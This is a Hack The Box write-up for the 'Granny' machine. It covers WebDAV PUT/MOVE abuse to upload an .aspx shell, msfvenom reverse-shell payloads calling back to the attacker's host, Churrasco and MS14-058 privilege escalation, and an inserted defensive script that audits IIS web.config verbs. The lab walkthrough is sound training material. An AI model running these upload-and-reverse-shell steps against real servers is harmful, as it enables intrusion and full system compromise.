Hackthebox writeup for granny

Sheetal Patil
6 min read · Jul 10, 2021

Mind Opener

The HTTP protocol allows us to use methods like GET, POST, PUT and DELETE to send or delete data; however, are there any methods with which we can edit, copy or manage files on a remote server?

If such a protocol or extension allows you to copy or move files, can you abuse this functionality to compromise a server?

As always, begin with the nmap scan.

From the nmap scan, three things are important:

  1. Port 80 is open and running an outdated Microsoft IIS server.
  2. WebDAV (an extension of the HTTP protocol) is in use.
  3. Multiple HTTP methods are allowed.

What is WebDAV?

WebDAV stands for “Web-based Distributed Authoring and Versioning”. It is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.

Use the davtest scanner, which uploads test executables to determine whether the service is exploitable.

davtest -url http://10.10.10.15

To analyze how WebDAV works, add a new proxy listener in Burp and redirect its traffic to the victim.

Adding a new listener to Burp to intercept WebDAV traffic

curl localhost
davtest -url http://localhost

From Burp history, grab a file that was successfully uploaded and send it to Repeater.

Viewing davtest uploads in the history

From the Repeater tab, create another HTML file.

The good news is:

  1. We can simply access the upload directory (no dirbuster this time!).
  2. We are also permitted to upload a file.

Create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.20 LPORT=4455 -o shell.aspx

But the bad news is that PUTting an .aspx file is forbidden.

From the nmap scan we know that the MOVE method is allowed. Read more about WebDAV features here.

MOVE method syntax below:

MOVE /source HTTP/1.1
Destination: /destination
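The request filter on Granny refuses a PUT of an .aspx file but says nothing about the MOVE that renames a .txt upload afterwards. As an added example that is not part of this writeup, the script below audits an IIS web.config: a weak requestFiltering setting (extension deny only) is compared with a hardened one that denies the WebDAV write verbs outright. Both web.config fragments are constructed for the demo; the element names follow the real IIS 7+ requestFiltering schema (on IIS 6, which Granny runs, the equivalent switches live in IIS Manager rather than web.config).

```python
"""Added example (not from the writeup): audit an IIS web.config for the
WebDAV write verbs that make the upload-then-rename chain possible. Both
config strings are constructed for the demo."""
import xml.etree.ElementTree as ET

# Verbs that let a client create, rename or delete content on the server.
WRITE_VERBS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Weak setting (constructed): .aspx uploads are refused, but nothing stops a
# client from PUTting shell.txt and then MOVEing it to shell.aspx.
WEAK_CONFIG = """<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <fileExtensions>
          <add fileExtension=".aspx" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""

# Hardened setting (constructed): every write verb is denied, so the filter
# no longer depends on guessing which extensions are dangerous.
HARDENED_CONFIG = """<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <verbs allowUnlisted="true">
          <add verb="PUT" allowed="false" />
          <add verb="DELETE" allowed="false" />
          <add verb="MOVE" allowed="false" />
          <add verb="COPY" allowed="false" />
          <add verb="MKCOL" allowed="false" />
          <add verb="PROPPATCH" allowed="false" />
        </verbs>
        <fileExtensions>
          <add fileExtension=".aspx" allowed="false" />
        </fileExtensions>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>"""


def allowed_write_verbs(web_config_xml):
    """Return, sorted, the write verbs this web.config still lets through."""
    root = ET.fromstring(web_config_xml)
    verbs = root.find("./system.webServer/security/requestFiltering/verbs")
    if verbs is None:
        return sorted(WRITE_VERBS)  # no verb filtering configured at all
    allow_unlisted = verbs.get("allowUnlisted", "true").lower() == "true"
    listed = {a.get("verb", "").upper(): a.get("allowed", "true").lower() == "true"
              for a in verbs.findall("add")}
    if allow_unlisted:
        denied = {v for v, ok in listed.items() if not ok}
        return sorted(WRITE_VERBS - denied)
    # allowUnlisted="false": only verbs explicitly marked allowed pass
    return sorted(v for v in WRITE_VERBS if listed.get(v, False))


def is_upload_rename_closed(web_config_xml):
    """True when the PUT + MOVE/COPY chain cannot succeed under this config."""
    remaining = set(allowed_write_verbs(web_config_xml))
    return "PUT" not in remaining or not ({"MOVE", "COPY"} & remaining)


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, allowed_write_verbs(cfg), "chain closed:", is_upload_rename_closed(cfg))
```

Where authoring is not needed at all, the cleaner fix is to remove the WebDAV module from the server entirely; the verb filter above is the fallback for hosts that must keep it.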

The Burp Suite method was described in the IppSec video (the best); however, as I read further (special thanks to 0xdf's articles), I came to know that it is possible to upload the shell using curl as well (with various different syntaxes). I have learnt and tried both methods.

Shell upload using Burp Suite

Rename the msfvenom payload to testshell.html and upload it with the PUT method.

Then use the MOVE method to change the extension to .aspx.

Start a netcat listener and grab the shell:

curl http://10.10.10.15/shell.aspx

Shell upload using curl

Rename shell.aspx to shell.txt and upload it:

cp shell.aspx shell.txt
curl http://10.10.10.15 --upload-file shell.txt

Rename it back to .aspx with MOVE:

curl -X MOVE --header "Destination:http://10.10.10.15/aspshell.aspx" http://10.10.10.15/shell.txt
  • -X, --request <command>  Specify request command to use
  • -H, --header <header/@file>  Pass custom header(s) to server

Then grab the shell.

This machine shows access denied while trying to grab the user.txt flag, so we'll move on to privilege escalation.

Privilege Escalation

Run Windows Exploit Suggester:

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Check its readme file for the usage and proceed:

./windows-exploit-suggester.py --update

An Excel file is created at this step.

Run the systeminfo command on the Granny machine, paste its output on the attacker machine and save it in the systeminfo.txt file.

I had to install a few xlrd packages; the commands are listed in the screenshot below. After installing the packages, run the exploit suggester:

./windows-exploit-suggester.py --database 2021-07-09-mssb.xls --systeminfo systeminfo.txt

Multiple exploits are suggested; since I had used MS15-051 on the Bastard machine, I did not try it here and went ahead with the Churrasco exploit.

More about access tokens, ACLs and token hijacking at the links below:

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens?redirectedfrom=MSDN

https://dl.packetstormsecurity.net/papers/presentations/TokenKidnapping.pdf

Priv Esc in Action

Upload and rename the churrasco.exe file using the same methods that we used earlier:

curl -X MOVE --header "Destination:http://10.10.10.15/chr.exe" http://10.10.10.15/chr.txt

The file is moved to the inetpub/wwwroot directory, but we do not have write permission there. So create a temp directory and copy our exploit into it.

chr.exe -d "cmd" executes the command; however, it does not give us a stable system shell. So we create a reverse shell executable and use Churrasco to execute it to get an admin session.

Generate a reverse shell and copy it to Granny using the same methods discussed previously:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=6677 -f exe -o revshell.exe

Copy the revshell to the Granny machine and execute it using the churrasco.exe file that we copied earlier.

Grab the system shell at the netcat listener and capture the flag.

Granny exploitation using Metasploit

Generate a payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5566 -f aspx > payload.aspx

Upload the payload to the server.

In msfconsole, start the exploit/multi/handler module:

use exploit/multi/handler

Tell the handler which payload to expect, so configure it with the same settings as the payload we generated:

set payload windows/meterpreter/reverse_tcp

Visit the file in the browser and it opens a Meterpreter session for us.

We cannot capture the user flag, as access is denied.

So we need to move to privilege escalation: background the session, use the exploit suggester as below, set the session and run it.

Use MS14-058 and run it.

Grab the root flag.

Skills that I learnt from this machine

  1. List and understand the usage of HTTP methods.
  2. Incorporate the use of HTTP methods with curl / Burp Suite Repeater to put, move / copy data.
  3. Use the WebDAV MOVE method to replace files with executables.
  4. Practical hands-on with msfvenom and Meterpreter.
  5. Using Windows Exploit Suggester and the Churrasco exploit for privilege escalation.
